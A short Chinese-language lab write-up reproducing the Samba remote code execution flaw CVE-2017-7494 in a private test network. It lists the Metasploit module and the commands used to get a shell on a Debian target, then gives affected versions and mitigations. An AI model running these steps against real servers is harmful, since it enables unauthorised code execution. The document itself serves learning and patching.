Samba CVE-2017-7494驗證明驗

漏洞簡介

Samba是在Linux和UNIX系統上實現SMB協議的一個軟件，很多IoT設備也使用了Samba。2017年5月24日Samba發佈了4.6.4版本，修復了一個嚴重的遠程代碼執行漏洞，漏洞編號CVE-2017-7494，攻擊者能夠利用該漏洞在目標服務器上執行任意代碼。2017年5月25日hdm給metasploit提交了該漏洞的exp。2017年5月25日openwrt發佈了針對該漏洞的修復補丁，許多IoT設備一樣受該漏洞影響。

測試環境
攻擊機：kali                                    IP：192.168.0.10
靶   機：debian                              IP：192.168.0.20
服務：samba: 4.5

漏洞驗證

啓動Kali執行命令：

msfconsole

msf > use exploit/linux/samba/is_known_pipename

set RHOST 192.168.0.20

run

進入目標系統並查看文件：

cd /  ls
驗證完成

影響版本：
Samba：3.5     <4.6.4     <4.5.10     <4.4.14。
4.6.4/4.5.10/4.4.14已修復此漏洞。

修復建議：
一、臨時方案
在smb.conf的[global]節點下增長 nt pipe support = no選項，從新啓動samba服務。

二、官方修復
Samba已發佈新版本，可經過更新版本解決。

補丁下載
https://www.samba.org/

 

此實驗僅供學習參考,不得用於其餘任何目的，其餘違法行爲本人不負任何責任,在此申明!